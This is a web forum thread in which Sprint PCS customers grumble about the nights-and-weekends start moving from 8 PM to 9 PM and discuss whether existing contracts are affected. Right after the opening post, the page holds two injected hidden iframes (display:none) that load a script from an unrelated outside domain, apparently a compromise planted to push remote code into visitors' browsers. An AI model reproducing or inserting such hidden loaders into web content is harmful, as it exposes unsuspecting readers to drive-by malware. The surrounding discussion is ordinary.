+ Reply to Thread

Angry Peak time/Off peak time change

I've been with Sprint PCS for a few years and recently wanted to change my plan. They have some really attractive plans now,,, till I found out that they changed the nights and weekends switchover point from 8:00 to 9:00.

This kind of stinks cause this is the prime time that I use mine and that extra hour is significant. And now all their new plans use the new switchover time.

Anybody else irritated about this???<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Let he who is without sin cast the first stone.

OUCH!!!

Administrator

Arrow

not me. i have 10,000 minutes and i have plenty thru the day and night... it took a couple of days to get used to, but that one extra hour dont bother me...

but of course im sure im the only one... :p

i agree with the extra hour :p

my old cingular plan usedt o be 8:00PM, now i have to wait an extra hour before i can comfortably use my phone without worry that ill go over my time... >_<

oh well, theres always games on the palm that icna do for an hour or so :p

I was told by Sprint PCS that people who have contracts before Sprint PCS announced the time change will remain unaffected UNLESS they have changed their plans AFTER the announcement. As far as I can tell, my off-peak time still starts at 8 PM - judging from the online Airtime Usage Detail.

Thats true. Your plan is a service contract. Sprint cannot change the content of the contract. Someone posted that Sprints new plans will roll out Feb. 6th. Anxious to see what is offered. I anticipate a lot more day minutes... or at least some more

Originally posted by Marctronixx
    not me. i have 10,000 minutes and i have plenty thru the day and night... it took a couple of days to get used to, but that one extra hour dont bother me...

but of course im sure im the only one... :p
    damn, you talk alot

Administrator

Arrow

wrong playa...

i have my fiance on the same plan as me. i was going to get the 4000 minutes but i could get 10,000 minutes for the same price plus a few extras so i could not pass that up..:p

He doesn't talk a lot. He's just trying to convince himself that the tightening pain around his ankle from trying on the new ball and chain won't inhibit his ability to think!:p

Whats the date Marc? Maybe we'll all chip in and donate a cake in the shape of a giant I300. Or maybe alternate I300 and 6035 on diff't tiers!

Angry It's the ol' Hook 'n' Switch

It is sooo frustrating!!
    They get you hooked and then start messing with ya!

I, too, was going to improve my plan. But as soon as they said "...starts at 9pm..." I abandoned! Haven't they ever heard of "grandfather clauses" to reward those of us who have already signed-on!

The new subscribers may get better financial deals, but I get to start talking an hour before they do!!

I was also ready to upgrade my $59 total digital connection plan to the new one.... but after I saw they changed the night time minutes from 8 to 9pm I stayed put....

Brooks